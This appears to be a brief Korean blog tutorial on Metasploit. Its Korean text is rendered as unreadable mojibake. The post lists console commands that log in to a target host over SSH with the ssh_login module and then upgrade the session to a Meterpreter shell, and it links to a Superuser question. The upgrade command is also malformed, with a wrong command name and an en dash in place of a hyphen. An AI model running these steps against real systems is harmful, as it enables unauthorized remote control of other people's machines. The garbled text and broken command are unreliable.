๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐Ÿ”’์ •๋ณด๋ณด์•ˆ/๋ฉ”ํƒ€์Šคํ”Œ๋กœ์ž‡

๋ฉ”ํƒ€์Šคํ”Œ๋กœ์ž‡ - SSH์—์„œ Meterpreter๋กœ ์—…๊ทธ๋ ˆ์ด๋“œ

by Janger 2024. 2. 8.
728x90
๋ฐ˜์‘ํ˜•

 

MSF SSH ๋กœ๊ทธ์ธ

 

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109  
msf auxiliary(ssh_login) > set username foo   
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit

 

์„ธ์…˜ ์—…๊ทธ๋ ˆ์ด๋“œ(-u)

 

session –u 1

 

 

์ถœ์ฒ˜: 

https://superuser.com/questions/1322515/meterpreter-on-ssh-connection

 

Meterpreter on ssh connection

I'm behind NAT. I can log in over ssh to the target. How to use metasploit / Send meterpreter over that SSH connection? I tried shell_to_meterpreter but it failed because I can't open my port ...

superuser.com

 

728x90
๋ฐ˜์‘ํ˜•